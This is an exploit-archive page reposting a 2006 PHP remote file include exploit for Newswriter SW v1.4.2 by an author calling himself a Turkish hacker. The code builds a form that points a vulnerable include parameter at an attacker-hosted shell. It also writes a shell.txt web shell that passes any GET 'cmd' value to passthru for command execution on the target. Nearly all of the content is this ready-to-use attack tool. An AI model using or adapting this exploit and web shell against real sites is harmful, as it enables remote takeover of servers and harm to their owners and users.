exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NewswriterSWv1.4.2.txt

NewswriterSWv1.4.2.txt
Posted Oct 4, 2006
Authored by XORON

Newswriter SW v1.4.2 Remote File Include Exploit

tags | exploit, remote
SHA-256 | 313a6ce7c66064af65de36a0e16933d2acbee5073a4283ce8a1c1cf8765dadf5
Download | Favorite | View

NewswriterSWv1.4.2.txt

Change Mirror Download
<?php
/* XORON - TURKISH HACKER

Thanx: str0ke, Ironfist, Preddy,

*/

$cmd = $_POST["cmd"];
$glowna = $_POST["glowna"];
$shell = $_POST["shell"];
$exp= "<title>Newswriter SW v1.4.2 Remote File Include Exploit :: XORON :: 
TURKISH HACKER ::</title>"
."<style type=\"text/css\">"
."body {background-color: #006600;}"
."body,td,th {color: #FFFFFF;}"
."</style><form method=\"post\" action=\"".$glowna.$shell."?cmd=".$cmd."\">"
."<div align=\"center\"><img src=\"https://xoron.biz/teamvh4.png\"></div>"
."<p align=\"center\">script url: (ex. 
https://www.site.com/[script_path]/include/main.inc.php?NWCONF_SYSTEM[server_path]=)<br>"
."<input type=\"text\" name=\"glowna\" size=\"90\"".$glowna."\">"
."<br>"
."shell url: (ex. https://www.site.com/[path]/shell.txt?) shell.txt (CHMOD 
777)<br>"
."<input type=\"text\" name=\"shell\" size=\"90\"".$shell."\">"
."<br>"
."cmd: (ex. ls -la)<br>"
."<input name=\"cmd\" type=\"text\" size=\"90\"".$cmd."\">"
."<br>"
."<input type=\"submit\" value=\"Exploit\" name=\"submit\">"
."</p>"
."<p align=\"center\">Find by: <a 
href=\"mailto:x0r0n@hotmail.com\">XORON</a>"
."<br>"
."<p align=\"center\"> <a 
href=\"https://www.xoron.biz/\">https://www.xoron.biz/</a></p>"
."<p align=\"center\" class=\"name\">&nbsp;</p>"
."<HR WIDTH=\"650\" ALIGN=\"center\">"
."<p align=\"center\"> Special Greetz: Str0ke, Ironfist, Preddy, rgod  
;-)<br>"
."<br>"
."<p align=\"center\">&nbsp;</p>"
."</form>";

if (!isset($_POST['submit']))
{
echo $exp;
}else{
$file = fopen ("shell.txt", "w+");
fwrite($file, '<?php 
ob_clean();echo"xoron-turkish-hacker";ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>');
fclose($file);
$file = fopen ($shell, "r");
if (!$file) {
    echo "<p>Don't Find shell :( Insert in FTP shell.txt.\n";
    exit;
}
echo $exp;
while (!feof ($file)) {
    $line .= fgets ($file, 1024)."<br>";
    }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
}
?>

# milw0rm.com [2006-09-27]

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close